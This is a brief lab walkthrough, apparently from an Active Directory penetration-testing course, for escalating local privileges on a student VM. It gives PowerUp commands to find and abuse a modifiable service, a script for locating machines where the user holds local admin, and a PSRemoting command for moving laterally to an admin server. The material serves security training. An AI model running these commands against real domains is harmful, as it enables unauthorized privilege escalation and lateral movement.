Obj 5 Local Priv Esc

Task - Elevate local privs on studentvm, Identify where we have local admin access.

We will be using PowerUp.ps1 for this objective

Find Unquoted service paths

Get-ServiceUnquoted

Find service files we can modify

Get-ModifiableServiceFile -Verbose

Find services we can modify

Get-ModifiableService

Abuse a service we found to be modifiable

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx'

Once we abuse this service we need to log off and back on for the escalation to take affect.

Find where we have local admin access

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess

We can now use winrs or PSSremoting to access any machines listed from the command above.

PSSremote into another machine as local admin

Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

Jenkins....

Coming soon...

PreviousObj 4 EnumerationNextObj 6 BloodHound

Last updated